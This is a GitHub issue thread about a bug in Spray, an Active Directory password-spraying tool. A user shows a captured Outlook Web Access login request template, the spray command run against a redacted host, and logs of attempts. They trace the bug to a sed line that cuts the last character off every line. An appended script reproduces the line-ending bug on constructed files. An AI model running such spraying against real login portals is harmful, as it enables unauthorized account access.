Greenwolf / Spray

A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf)
GNU General Public License v3.0

Post request file getting mangled when spraying OWA #9

Open v01dlight opened 3 years ago

v01dlight commented 3 years ago

I'm attempting to spray an OWA instance I know should contain some hits, but after letting a spray job run overnight it had gone through a decent chunk of the password list and found nothing, which I thought was odd since this was against a userlist of 600+. I noticed that the spray-logs.txt file had a very large number in front of each attempt, which didn't match up with what I'd expect the byte size of a failed attempt to be. I double checked the post request file to make sure I didn't mess something up, and noticed that the IP in the host header was missing some digits. At first I thought I must have screwed it up when I pasted that data in from Burp, but then I realized every line had some characters chopped off the end. I set up a new spray to replicate the issue and verified that once the tool starts running, it is editing the supplied post request file in a way that mangles the attack. I redacted the actual IP and domain I was testing against, but you can see below that the post request looks correct before I start, and when checked after the attack is running it is missing the last character of every line.

root@kali:~# cat owa-post-request.txt 
POST /owa/auth.owa HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Connection: close
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=0
Upgrade-Insecure-Requests: 1

destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=1
root@kali:~# spray -owa "https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fowa" test-users.txt /opt/Spray/passwords-English.txt 2 35 owa-post-request.txt &
[1] 910149
root@kali:~# 
Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)

11:38:35 Spraying with password: Users Username
11:38:36 Spraying with password: RedactedOrgName1
cat: logs/usernamestoremove.txt: No such file or directory
rm: cannot remove 'logs/usernamestoremove.txt': No such file or directory

root@kali:~# tail logs/spray-logs.txt 
56468 joe.shmoe%joe.shmoe
56468 example.person%example.person
56468 abraham.lincoln%abraham.lincoln
56468 singleword%singleword
56468 joe.shmoe%Unity1
56468 example.person%Unity1
56468 abraham.lincoln%Unity1
56468 singleword%Unity1
root@kali:~# cat owa-post-request.txt
POST /owa/auth.owa HTTP/1.
Host: 1.1.1.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Accept-Language: en-US,en;q=0.
Accept-Encoding: gzip, deflat
Referer: https://1.1.1.1/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2f1.1.1.1%2fow
Content-Type: application/x-www-form-urlencode
Content-Length: 15
Connection: clos
Cookie: ClientId=LLDFBDMQA0OGJRADTIGW; PrivateComputer=true; PBack=
Upgrade-Insecure-Requests: 

destination=https%3A%2F%2F1.1.1.1%2Fowa&flags=4&forcedownlevel=0&username=§sprayuser§%40redacted.org&password=spraypassword&passwordText=&isUtf8=
root@kali:~# 
v01dlight commented 3 years ago

I commented out line 177, sed -i.bak 's/.$//' $postrequest, which seemed to be the culprit for cutting the last character off every line, but I'm still getting way different response sizes than I see in Burp. Not sure if the issue is solved.
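The truncation above comes from s/.$// deleting the last character of every line regardless of what it is: on a CRLF file (as Burp exports) that character is the carriage return, but on an LF-only file it is the last real byte. The script below is an added example, not part of the Spray project or the poster's comments; it reproduces the mangling on constructed LF-only and CRLF request files and shows a normalizer (assumed to match the original intent) that strips only a trailing CR.

```shell
#!/usr/bin/env bash
# Added example (not from the Spray project): compare the issue's sed
# expression with a line-ending-aware replacement on constructed input.

# The expression reported in the issue: drops the final character of each
# line, whatever it is. Harmless on CRLF files, destructive on LF-only ones.
mangle_request() {
    sed 's/.$//' "$1"
}

# Assumed intent: strip the CR of CRLF endings. A literal CR is built with
# printf so the pattern works on both GNU and BSD sed.
normalize_request() {
    cr=$(printf '\r')
    sed "s/${cr}\$//" "$1"
}

# Sanity check before touching a request file: how many lines end in CR?
# 0 means the file is already LF-only and needs no normalization.
crlf_line_count() {
    cr=$(printf '\r')
    grep -c "${cr}\$" "$1" || true
}

# Constructed sample: LF-only request file, as in the issue report.
make_lf_sample() {
    printf 'POST /owa/auth.owa HTTP/1.1\nHost: 1.1.1.1\nConnection: close\n' > "$1"
}

# Constructed sample: the same request with CRLF endings, as Burp exports it.
make_crlf_sample() {
    printf 'POST /owa/auth.owa HTTP/1.1\r\nHost: 1.1.1.1\r\nConnection: close\r\n' > "$1"
}

# Returns the Host header after running the given normalizer ($1) on file $2,
# which makes the difference between the two approaches visible.
host_after() {
    "$1" "$2" | grep '^Host:'
}

# Stand-alone demonstration when run directly.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    tmp=$(mktemp -d)
    make_lf_sample "$tmp/lf.txt"; make_crlf_sample "$tmp/crlf.txt"
    echo "LF file, mangled:    $(host_after mangle_request "$tmp/lf.txt")"
    echo "LF file, normalized: $(host_after normalize_request "$tmp/lf.txt")"
    echo "CRLF lines in Burp export: $(crlf_line_count "$tmp/crlf.txt")"
    rm -rf "$tmp"
fi
```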